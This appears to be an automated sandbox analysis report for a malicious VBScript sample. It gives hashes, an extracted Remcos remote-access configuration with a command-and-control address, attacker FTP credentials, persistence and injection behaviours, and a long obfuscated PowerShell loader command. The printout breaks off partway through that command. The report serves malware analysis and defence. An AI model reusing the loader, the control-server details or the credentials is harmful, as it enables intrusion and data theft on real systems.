Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
04/10/2024, 01:39 UTC
Static task
static1
Behavioral task
behavioral1
Sample
7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15.vbs
Resource
win10v2004-20240802-en
General
-
Target
7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15.vbs
-
Size
591KB
-
MD5
9b36a3c24abb6bc8694e48e0c101c416
-
SHA1
6fd1c1c65d63f349734f2efcce64c88b3efd5e45
-
SHA256
7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15
-
SHA512
e22e5725ff50239c8df0ea9010ea389bdd79392dbcf01d65c9af5a32fd0084f501db879fcee5dfee0a2d02c9626d7d8f61abb240189d9fcf6ae00b1602298f64
-
SSDEEP
1536:rcccccccccccccccccq99999999999999999999999999999999999999999999n:J
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=
Extracted
Protocol: ftp- Host:
ftp.desckvbrat.com.br - Port:
21 - Username:
desckvbrat1 - Password:
developerpro21578Jp@@
Extracted
remcos
NedDay
212.162.149.163:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
1210
-
mouse_option
false
-
mutex
Rmc-52K54M
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 7 IoCs
flow pid Process 12 3308 powershell.exe 16 3308 powershell.exe 18 3308 powershell.exe 20 3308 powershell.exe 22 3308 powershell.exe 23 3308 powershell.exe 27 2880 powershell.exe -
pid Process 2432 powershell.exe 3308 powershell.exe 1868 powershell.exe 2592 powershell.exe 2880 powershell.exe 1020 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_bcf = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Roaming\\Program Rules NVIDEO\\Update Drivers NVIDEO\\Update Drivers NVIDEO\\Update Drivers NVIDEO\\rnmzv.ps1' \";exit" powershell.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 26 pastebin.com 27 pastebin.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2880 set thread context of 4040 2880 powershell.exe 91 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 2432 powershell.exe 2432 powershell.exe 3308 powershell.exe 3308 powershell.exe 1868 powershell.exe 2592 powershell.exe 2592 powershell.exe 1868 powershell.exe 1020 powershell.exe 1020 powershell.exe 2880 powershell.exe 2880 powershell.exe 2880 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2432 powershell.exe Token: SeDebugPrivilege 3308 powershell.exe Token: SeDebugPrivilege 1868 powershell.exe Token: SeDebugPrivilege 2592 powershell.exe Token: SeDebugPrivilege 1020 powershell.exe Token: SeDebugPrivilege 2880 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4040 RegAsm.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2420 wrote to memory of 2432 2420 WScript.exe 82 PID 2420 wrote to memory of 2432 2420 WScript.exe 82 PID 2432 wrote to memory of 3308 2432 powershell.exe 84 PID 2432 wrote to memory of 3308 2432 powershell.exe 84 PID 3308 wrote to memory of 2592 3308 powershell.exe 85 PID 3308 wrote to memory of 2592 3308 powershell.exe 85 PID 3308 wrote to memory of 1868 3308 powershell.exe 86 PID 3308 wrote to memory of 1868 3308 powershell.exe 86 PID 3308 wrote to memory of 1832 3308 powershell.exe 87 PID 3308 wrote to memory of 1832 3308 powershell.exe 87 PID 3308 wrote to memory of 1020 3308 powershell.exe 88 PID 3308 wrote to memory of 1020 3308 powershell.exe 88 PID 3308 wrote to memory of 2880 3308 powershell.exe 89 PID 3308 wrote to memory of 2880 3308 powershell.exe 89 PID 3308 wrote to memory of 3196 3308 powershell.exe 90 PID 3308 wrote to memory of 3196 3308 powershell.exe 90 PID 2880 wrote to memory of 4040 2880 powershell.exe 91 PID 2880 wrote to memory of 4040 2880 powershell.exe 91 PID 2880 wrote to memory of 4040 2880 powershell.exe 91 PID 2880 wrote to memory of 4040 2880 powershell.exe 91 PID 2880 wrote to memory of 4040 2880 powershell.exe 91 PID 2880 wrote to memory of 4040 2880 powershell.exe 91 PID 2880 wrote to memory of 4040 2880 powershell.exe 91 PID 2880 wrote to memory of 4040 2880 powershell.exe 91 PID 2880 wrote to memory of 4040 2880 powershell.exe 91 PID 2880 wrote to memory of 4040 2880 powershell.exe 91 PID 2880 wrote to memory of 4040 2880 powershell.exe 91 PID 2880 wrote to memory of 4040 2880 powershell.exe 91
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'Ec' + [char]65 + 'Lg' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'WgBj' + [char]65 + 'EI' + [char]65 + 'YwBh' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Ew' + [char]65 + 'LgBu' + [char]65 + 'Gk' + [char]65 + 'YQBt' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + 'B0' + [char]65 + 'G4' + [char]65 + 'ZQBy' + [char]65 + 'HI' + [char]65 + 'dQBD' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'G4' + [char]65 + 'aQBh' + [char]65 + 'G0' + [char]65 + 'bwBE' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'BB' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'JwBB' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'JwCTITo' + [char]65 + 'kyEn' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'GM' + [char]65 + 'YQBs' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBS' + [char]65 + 'C4' + [char]65 + 'ZwBT' + [char]65 + 'Ho' + [char]65 + 'QwBC' + [char]65 + 'Gw' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cg' + [char]65 + 'ZwBu' + [char]65 + 'Gk' + [char]65 + 'cgB0' + [char]65 + 'FM' + [char]65 + 'N' + [char]65 + '' + [char]65 + '2' + [char]65 + 'GU' + [char]65 + 'cwBh' + [char]65 + 'EI' + [char]65 + 'bQBv' + [char]65 + 'HI' + [char]65 + 'Rg' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQB0' + [char]65 + 'HI' + [char]65 + 'ZQB2' + [char]65 + 'G4' + [char]65 + 'bwBD' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Ba' + [char]65 + 'GM' + [char]65 + 'QgBj' + [char]65 + 'GE' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'B5' + [char]65 + 'EI' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'Cc' + [char]65 + 'JQBJ' + [char]65 + 'Gg' + [char]65 + 'cQBS' + [char]65 + 'Fg' + [char]65 + 'JQ' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Fg' + [char]65 + 'U' + [char]65 + 'BV' + [char]65 + 'HU' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'HI' + [char]65 + 'd' + [char]65 + 'BT' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Gw' + [char]65 + 'bgB3' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + '4' + [char]65 + 'EY' + [char]65 + 'V' + [char]65 + 'BV' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'GQ' + [char]65 + 'bwBj' + [char]65 + 'G4' + [char]65 + 'RQ' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'e' + [char]65 + 'Bl' + [char]65 + 'FQ' + [char]65 + 'LgBt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'Hk' + [char]65 + 'UwBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'GQ' + [char]65 + 'bwBj' + [char]65 + 'G4' + [char]65 + 'RQ' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQB0' + [char]65 + 'G4' + [char]65 + 'ZQBp' + [char]65 + 'Gw' + [char]65 + 'QwBi' + [char]65 + 'GU' + [char]65 + 'Vw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'Bj' + [char]65 + 'GU' + [char]65 + 'agBi' + [char]65 + 'E8' + [char]65 + 'LQB3' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'o' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'cwBv' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cwBp' + [char]65 + 'GQ' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'HQ' + [char]65 + 'e' + [char]65 + 'B0' + [char]65 + 'C4' + [char]65 + 'MQ' + [char]65 + 'w' + [char]65 + 'Ew' + [char]65 + 'T' + [char]65 + 'BE' + [char]65 + 'C8' + [char]65 + 'MQ' + [char]65 + 'w' + [char]65 + 'C8' + [char]65 + 'cgBl' + [char]65 + 'HQ' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'HI' + [char]65 + 'YwBw' + [char]65 + 'FU' + [char]65 + 'LwBy' + [char]65 + 'GI' + [char]65 + 'LgBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'YQBy' + [char]65 + 'GI' + [char]65 + 'dgBr' + [char]65 + 'GM' + [char]65 + 'cwBl' + [char]65 + 'GQ' + [char]65 + 'LgBw' + [char]65 + 'HQ' + [char]65 + 'ZgB' + [char]65 + '' + [char]65 + 'DE' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'HI' + [char]65 + 'YgB2' + [char]65 + 'Gs' + [char]65 + 'YwBz' + [char]65 + 'GU' + [char]65 + 'Z' + [char]65 + '' + [char]65 + 'v' + [char]65 + 'C8' + [char]65 + 'OgBw' + [char]65 + 'HQ' + [char]65 + 'Zg' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBy' + [char]65 + 'HQ' + [char]65 + 'UwBk' + [char]65 + 'GE' + [char]65 + 'bwBs' + [char]65 + 'G4' + [char]65 + 'dwBv' + [char]65 + 'EQ' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'FM' + [char]65 + 'egBD' + [char]65 + 'EI' + [char]65 + 'b' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'E' + [char]65 + '' + [char]65 + 'Q' + [char]65 + 'Bw' + [char]65 + 'Eo' + [char]65 + 'O' + [char]65 + '' + [char]65 + '3' + [char]65 + 'DU' + [char]65 + 'MQ' + [char]65 + 'y' + [char]65 + 'G8' + [char]65 + 'cgBw' + [char]65 + 'HI' + [char]65 + 'ZQBw' + [char]65 + 'G8' + [char]65 + 'b' + [char]65 + 'Bl' + [char]65 + 'HY' + [char]65 + 'ZQBk' + [char]65 + 'Cc' + [char]65 + 'L' + [char]65 + '' + [char]65 + 'p' + [char]65 + 'Ck' + [char]65 + 'OQ' + [char]65 + '0' + [char]65 + 'Cw' + [char]65 + 'Ng' + [char]65 + 'x' + [char]65 + 'DE' + [char]65 + 'L' + [char]65 + '' + [char]65 + '3' + [char]65 + 'Dk' + [char]65 + 'L' + [char]65 + '' + [char]65 + '0' + [char]65 + 'DE' + [char]65 + 'MQ' + [char]65 + 's' + [char]65 + 'Dg' + [char]65 + 'OQ' + [char]65 + 's' + [char]65 + 'Dg' + [char]65 + 'MQ' + [char]65 + 'x' + [char]65 + 'Cw' + [char]65 + 'Nw' + [char]65 + 'w' + [char]65 + 'DE' + [char]65 + 'L' + [char]65 + '' + [char]65 + '5' + [char]65 + 'Dk' + [char]65 + 'L' + [char]65 + '' + [char]65 + '1' + [char]65 + 'DE' + [char]65 + 'MQ' + [char]65 + 's' + [char]65 + 'DE' + [char]65 + 'M' + [char]65 + '' + [char]65 + 'x' + [char]65 + 'Cw' + [char]65 + 'M' + [char]65 + '' + [char]65 + 'w' + [char]65 + 'DE' + [char]65 + 'K' + [char]65 + 'Bd' + [char]65 + 'F0' + [char]65 + 'WwBy' + [char]65 + 'GE' + [char]65 + 'a' + [char]65 + 'Bj' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'bwBq' + [char]65 + 'C0' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'Gw' + [char]65 + 'YQBp' + [char]65 + 'HQ' + [char]65 + 'bgBl' + [char]65 + 'GQ' + [char]65 + 'ZQBy' + [char]65 + 'EM' + [char]65 + 'awBy' + [char]65 + 'G8' + [char]65 + 'dwB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'GM' + [char]65 + 'ZQBq' + [char]65 + 'GI' + [char]65 + 'bw' + [char]65 + 't' + [char]65 + 'Hc' + [char]65 + 'ZQBu' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'HM' + [char]65 + 'b' + [char]65 + 'Bh' + [char]65 + 'Gk' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HI' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'O' + [char]65 + 'BG' + [char]65 + 'FQ' + [char]65 + 'VQ' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQBn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'ZQBU' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'aQBs' + [char]65 + 'EM' + [char]65 + 'YgBl' + [char]65 + 'Fc' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'g' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBP' + [char]65 + 'C0' + [char]65 + 'dwBl' + [char]65 + 'E4' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + 'y' + [char]65 + 'DE' + [char]65 + 'cwBs' + [char]65 + 'FQ' + [char]65 + 'Og' + [char]65 + '6' + [char]65 + 'F0' + [char]65 + 'ZQBw' + [char]65 + 'Hk' + [char]65 + 'V' + [char]65 + 'Bs' + [char]65 + 'G8' + [char]65 + 'YwBv' + [char]65 + 'HQ' + [char]65 + 'bwBy' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'eQB0' + [char]65 + 'Gk' + [char]65 + 'cgB1' + [char]65 + 'GM' + [char]65 + 'ZQBT' + [char]65 + 'C4' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'E4' + [char]65 + 'LgBt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'Hk' + [char]65 + 'UwBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gw' + [char]65 + 'bwBj' + [char]65 + 'G8' + [char]65 + 'd' + [char]65 + 'Bv' + [char]65 + 'HI' + [char]65 + 'U' + [char]65 + 'B5' + [char]65 + 'HQ' + [char]65 + 'aQBy' + [char]65 + 'HU' + [char]65 + 'YwBl' + [char]65 + 'FM' + [char]65 + 'Og' + [char]65 + '6' + [char]65 + 'F0' + [char]65 + 'cgBl' + [char]65 + 'Gc' + [char]65 + 'YQBu' + [char]65 + 'GE' + [char]65 + 'TQB0' + [char]65 + 'G4' + [char]65 + 'aQBv' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'ZQBj' + [char]65 + 'Gk' + [char]65 + 'dgBy' + [char]65 + 'GU' + [char]65 + 'Uw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'H0' + [char]65 + 'ZQB1' + [char]65 + 'HI' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Hs' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'awBj' + [char]65 + 'GE' + [char]65 + 'YgBs' + [char]65 + 'Gw' + [char]65 + 'YQBD' + [char]65 + 'G4' + [char]65 + 'bwBp' + [char]65 + 'HQ' + [char]65 + 'YQBk' + [char]65 + 'Gk' + [char]65 + 'b' + [char]65 + 'Bh' + [char]65 + 'FY' + [char]65 + 'ZQB0' + [char]65 + 'GE' + [char]65 + 'YwBp' + [char]65 + 'GY' + [char]65 + 'aQB0' + [char]65 + 'HI' + [char]65 + 'ZQBD' + [char]65 + 'HI' + [char]65 + 'ZQB2' + [char]65 + 'HI' + [char]65 + 'ZQBT' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'HI' + [char]65 + 'ZQBn' + [char]65 + 'GE' + [char]65 + 'bgBh' + [char]65 + 'E0' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'bwBQ' + [char]65 + 'GU' + [char]65 + 'YwBp' + [char]65 + 'HY' + [char]65 + 'cgBl' + [char]65 + 'FM' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'u' + [char]65 + 'G0' + [char]65 + 'ZQB0' + [char]65 + 'HM' + [char]65 + 'eQBT' + [char]65 + 'Fs' + [char]65 + 'ew' + [char]65 + 'g' + [char]65 + 'GU' + [char]65 + 'cwBs' + [char]65 + 'GU' + [char]65 + 'fQ' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'Lw' + [char]65 + 'g' + [char]65 + 'D' + [char]65 + '' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'By' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'G4' + [char]65 + 'dwBv' + [char]65 + 'GQ' + [char]65 + 'd' + [char]65 + 'B1' + [char]65 + 'Gg' + [char]65 + 'cw' + [char]65 + 'g' + [char]65 + 'Ds' + [char]65 + 'Jw' + [char]65 + 'w' + [char]65 + 'Dg' + [char]65 + 'MQ' + [char]65 + 'g' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBl' + [char]65 + 'Gw' + [char]65 + 'cw' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Z' + [char]65 + 'Bu' + [char]65 + 'GE' + [char]65 + 'bQBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 't' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'ZQB4' + [char]65 + 'GU' + [char]65 + 'LgBs' + [char]65 + 'Gw' + [char]65 + 'ZQBo' + [char]65 + 'HM' + [char]65 + 'cgBl' + [char]65 + 'Hc' + [char]65 + 'bwBw' + [char]65 + 'Ds' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'GM' + [char]65 + 'cgBv' + [char]65 + 'GY' + [char]65 + 'LQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'dQB0' + [char]65 + 'HI' + [char]65 + 'YQB0' + [char]65 + 'FM' + [char]65 + 'X' + [char]65 + 'Bz' + [char]65 + 'G0' + [char]65 + 'YQBy' + [char]65 + 'Gc' + [char]65 + 'bwBy' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'X' + [char]65 + 